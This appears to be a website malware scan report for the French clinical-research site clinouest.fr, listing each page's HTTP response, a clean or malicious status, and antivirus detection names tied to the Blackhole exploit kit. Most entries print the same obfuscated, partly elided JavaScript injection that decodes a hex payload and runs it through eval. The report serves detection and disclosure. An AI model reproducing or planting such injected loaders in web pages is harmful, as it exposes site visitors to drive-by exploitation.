| Request | Server response | Status |
http://www.clinouest.fr/ | 200 OK
Content-Length: 16325
Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d(
... 3522 bytes are skipped ...45(3d(89(82(8b(49(3d(82(8b(81(3d(46(3d(46(58(2a(27(9a(2a(27(86(83(3d(45(8b(7e(93(86(84(7e(91(8c(8f(4b(80(8c(8c(88(86(82(62(8b(7e(7f(89(82(81(46(2a(27(98(2a(27(86(83(45(64(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(46(5a(5a(52(52(46(98(9a(82(89(90(82(98(70(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(49(3d(44(52(52(44(49(3d(44(4e(44(49(3d(44(4c(44(46(58(2a(27(2a(27(8e(88(4d(56(45(46(58(2a(27(9a(2a(27(9a".split(oismz);sgyb="";mmyzf("mCharCode");ktcw(""+sgyb);}Antivirus reports:- AntiVir
- JS/Blacole.EB.182
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Bkav
- MW.Clodfc8.Trojan.21b7
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1030
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://www.clinouest.fr/index.html | 200 OK
Content-Length: 16325
Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d(
... 3522 bytes are skipped ...45(3d(89(82(8b(49(3d(82(8b(81(3d(46(3d(46(58(2a(27(9a(2a(27(86(83(3d(45(8b(7e(93(86(84(7e(91(8c(8f(4b(80(8c(8c(88(86(82(62(8b(7e(7f(89(82(81(46(2a(27(98(2a(27(86(83(45(64(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(46(5a(5a(52(52(46(98(9a(82(89(90(82(98(70(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(49(3d(44(52(52(44(49(3d(44(4e(44(49(3d(44(4c(44(46(58(2a(27(2a(27(8e(88(4d(56(45(46(58(2a(27(9a(2a(27(9a".split(oismz);sgyb="";mmyzf("mCharCode");ktcw(""+sgyb);}Antivirus reports:- AntiVir
- JS/Blacole.EB.182
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Bkav
- MW.Clodfc8.Trojan.21b7
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1030
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://www.clinouest.fr/contact_clinouest.php | 200 OK
Content-Length: 10684
Content-Type: text/html | clean |
http://www.clinouest.fr/notre_equipe_clinouest.html | 200 OK
Content-Length: 42215
Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d(
... 3522 bytes are skipped ...45(3d(89(82(8b(49(3d(82(8b(81(3d(46(3d(46(58(2a(27(9a(2a(27(86(83(3d(45(8b(7e(93(86(84(7e(91(8c(8f(4b(80(8c(8c(88(86(82(62(8b(7e(7f(89(82(81(46(2a(27(98(2a(27(86(83(45(64(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(46(5a(5a(52(52(46(98(9a(82(89(90(82(98(70(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(49(3d(44(52(52(44(49(3d(44(4e(44(49(3d(44(4c(44(46(58(2a(27(2a(27(8e(88(4d(56(45(46(58(2a(27(9a(2a(27(9a".split(oismz);sgyb="";mmyzf("mCharCode");ktcw(""+sgyb);}Antivirus reports:- AntiVir
- JS/Blacole.EB.182
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Bkav
- MW.Clodfc8.Trojan.21b7
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1030
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://www.clinouest.fr/savoir_faire_recherche_clinique.html | 200 OK
Content-Length: 16440
Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d(
... 3522 bytes are skipped ...45(3d(89(82(8b(49(3d(82(8b(81(3d(46(3d(46(58(2a(27(9a(2a(27(86(83(3d(45(8b(7e(93(86(84(7e(91(8c(8f(4b(80(8c(8c(88(86(82(62(8b(7e(7f(89(82(81(46(2a(27(98(2a(27(86(83(45(64(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(46(5a(5a(52(52(46(98(9a(82(89(90(82(98(70(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(49(3d(44(52(52(44(49(3d(44(4e(44(49(3d(44(4c(44(46(58(2a(27(2a(27(8e(88(4d(56(45(46(58(2a(27(9a(2a(27(9a".split(oismz);sgyb="";mmyzf("mCharCode");ktcw(""+sgyb);}Antivirus reports:- AntiVir
- JS/Blacole.EB.182
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Bkav
- MW.Clodfc8.Trojan.21b7
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1030
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://www.clinouest.fr/experience_recherche_clinique.html | 200 OK
Content-Length: 27167
Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d(
... 3522 bytes are skipped ...45(3d(89(82(8b(49(3d(82(8b(81(3d(46(3d(46(58(2a(27(9a(2a(27(86(83(3d(45(8b(7e(93(86(84(7e(91(8c(8f(4b(80(8c(8c(88(86(82(62(8b(7e(7f(89(82(81(46(2a(27(98(2a(27(86(83(45(64(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(46(5a(5a(52(52(46(98(9a(82(89(90(82(98(70(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(49(3d(44(52(52(44(49(3d(44(4e(44(49(3d(44(4c(44(46(58(2a(27(2a(27(8e(88(4d(56(45(46(58(2a(27(9a(2a(27(9a".split(oismz);sgyb="";mmyzf("mCharCode");ktcw(""+sgyb);}Antivirus reports:- AntiVir
- JS/Blacole.EB.182
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Bkav
- MW.Clodfc8.Trojan.21b7
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1030
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://www.clinouest.fr/reseau_recherche_clinique.html | 200 OK
Content-Length: 11194
Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d(
... 3522 bytes are skipped ...45(3d(89(82(8b(49(3d(82(8b(81(3d(46(3d(46(58(2a(27(9a(2a(27(86(83(3d(45(8b(7e(93(86(84(7e(91(8c(8f(4b(80(8c(8c(88(86(82(62(8b(7e(7f(89(82(81(46(2a(27(98(2a(27(86(83(45(64(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(46(5a(5a(52(52(46(98(9a(82(89(90(82(98(70(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(49(3d(44(52(52(44(49(3d(44(4e(44(49(3d(44(4c(44(46(58(2a(27(2a(27(8e(88(4d(56(45(46(58(2a(27(9a(2a(27(9a".split(oismz);sgyb="";mmyzf("mCharCode");ktcw(""+sgyb);}Antivirus reports:- AntiVir
- JS/Blacole.EB.182
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Bkav
- MW.Clodfc8.Trojan.21b7
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1030
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://www.clinouest.fr/infirmiere_recherche_clinique.html | 200 OK
Content-Length: 11818
Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d(
... 3522 bytes are skipped ...45(3d(89(82(8b(49(3d(82(8b(81(3d(46(3d(46(58(2a(27(9a(2a(27(86(83(3d(45(8b(7e(93(86(84(7e(91(8c(8f(4b(80(8c(8c(88(86(82(62(8b(7e(7f(89(82(81(46(2a(27(98(2a(27(86(83(45(64(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(46(5a(5a(52(52(46(98(9a(82(89(90(82(98(70(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(49(3d(44(52(52(44(49(3d(44(4e(44(49(3d(44(4c(44(46(58(2a(27(2a(27(8e(88(4d(56(45(46(58(2a(27(9a(2a(27(9a".split(oismz);sgyb="";mmyzf("mCharCode");ktcw(""+sgyb);}Antivirus reports:- AntiVir
- JS/Blacole.EB.182
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Bkav
- MW.Clodfc8.Trojan.21b7
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1030
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://www.clinouest.fr/biologie_essai_clinique.html | 200 OK
Content-Length: 12997
Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d(
... 3522 bytes are skipped ...45(3d(89(82(8b(49(3d(82(8b(81(3d(46(3d(46(58(2a(27(9a(2a(27(86(83(3d(45(8b(7e(93(86(84(7e(91(8c(8f(4b(80(8c(8c(88(86(82(62(8b(7e(7f(89(82(81(46(2a(27(98(2a(27(86(83(45(64(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(46(5a(5a(52(52(46(98(9a(82(89(90(82(98(70(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(49(3d(44(52(52(44(49(3d(44(4e(44(49(3d(44(4c(44(46(58(2a(27(2a(27(8e(88(4d(56(45(46(58(2a(27(9a(2a(27(9a".split(oismz);sgyb="";mmyzf("mCharCode");ktcw(""+sgyb);}Antivirus reports:- AntiVir
- JS/Blacole.EB.182
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Bkav
- MW.Clodfc8.Trojan.21b7
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1030
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://www.clinouest.fr/recrutement_medecins_investigateurs.html | 200 OK
Content-Length: 13272
Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d(
... 3522 bytes are skipped ...45(3d(89(82(8b(49(3d(82(8b(81(3d(46(3d(46(58(2a(27(9a(2a(27(86(83(3d(45(8b(7e(93(86(84(7e(91(8c(8f(4b(80(8c(8c(88(86(82(62(8b(7e(7f(89(82(81(46(2a(27(98(2a(27(86(83(45(64(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(46(5a(5a(52(52(46(98(9a(82(89(90(82(98(70(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(49(3d(44(52(52(44(49(3d(44(4e(44(49(3d(44(4c(44(46(58(2a(27(2a(27(8e(88(4d(56(45(46(58(2a(27(9a(2a(27(9a".split(oismz);sgyb="";mmyzf("mCharCode");ktcw(""+sgyb);}Antivirus reports:- AntiVir
- JS/Blacole.EB.182
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Bkav
- MW.Clodfc8.Trojan.21b7
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1030
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://www.clinouest.fr/logiciel_specifique_clinique.html | 200 OK
Content-Length: 10896
Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d(
... 3522 bytes are skipped ...45(3d(89(82(8b(49(3d(82(8b(81(3d(46(3d(46(58(2a(27(9a(2a(27(86(83(3d(45(8b(7e(93(86(84(7e(91(8c(8f(4b(80(8c(8c(88(86(82(62(8b(7e(7f(89(82(81(46(2a(27(98(2a(27(86(83(45(64(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(46(5a(5a(52(52(46(98(9a(82(89(90(82(98(70(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(49(3d(44(52(52(44(49(3d(44(4e(44(49(3d(44(4c(44(46(58(2a(27(2a(27(8e(88(4d(56(45(46(58(2a(27(9a(2a(27(9a".split(oismz);sgyb="";mmyzf("mCharCode");ktcw(""+sgyb);}Antivirus reports:- AntiVir
- JS/Blacole.EB.182
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Bkav
- MW.Clodfc8.Trojan.21b7
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1030
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://www.clinouest.fr/studynurse_etudes_clinique.html | 200 OK
Content-Length: 10156
Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d(
... 3522 bytes are skipped ...45(3d(89(82(8b(49(3d(82(8b(81(3d(46(3d(46(58(2a(27(9a(2a(27(86(83(3d(45(8b(7e(93(86(84(7e(91(8c(8f(4b(80(8c(8c(88(86(82(62(8b(7e(7f(89(82(81(46(2a(27(98(2a(27(86(83(45(64(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(46(5a(5a(52(52(46(98(9a(82(89(90(82(98(70(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(49(3d(44(52(52(44(49(3d(44(4e(44(49(3d(44(4c(44(46(58(2a(27(2a(27(8e(88(4d(56(45(46(58(2a(27(9a(2a(27(9a".split(oismz);sgyb="";mmyzf("mCharCode");ktcw(""+sgyb);}Antivirus reports:- AntiVir
- JS/Blacole.EB.182
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Bkav
- MW.Clodfc8.Trojan.21b7
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1030
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://www.clinouest.fr/legal_clinouest.html | 200 OK
Content-Length: 13617
Content-Type: text/html | malicious |
